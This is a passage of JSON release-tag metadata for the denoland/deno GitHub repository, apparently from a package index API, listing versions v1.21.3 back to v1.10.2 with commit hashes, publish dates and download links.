"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denolan